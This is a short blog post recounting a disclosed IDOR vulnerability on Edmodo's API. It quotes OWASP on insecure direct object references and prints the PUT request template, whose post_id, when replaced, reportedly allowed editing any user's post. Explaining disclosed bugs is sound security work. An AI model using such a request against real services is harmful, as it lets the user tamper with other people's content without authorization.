Modifying Any User Posts On Edmodo

This is an IDOR Vulnerability which was dislcosed by Arbin Godar on Edmodo website, Which allows him to modify any user Post.

Also Read: Brute force Attack On Instagram Password Change Functionality

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks - OWASP

The Request:

PUT /messages/<post_id>.replies_threaded_json?access_token=<Your_Access_Token> HTTP/1.1
Host: api.edmodo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Content-Type: application/json
Referer: https://www.edmodo.com/post
Content-Length: 1109
Origin: https://www.edmodo.com
Connection: keep-alive

So by replacing <post_id> with the User Post ID, Allows him to modify any Post and acting like the User.

Video POC

He was just rewarded with Swags which includes Stickers, T-shirt, Hoodies and Mugs.

Pythonista By Passion And Hacker By Interest, Let's connect on Facebook And Twitter.

Leave a Reply

Your email address will not be published. Required fields are marked *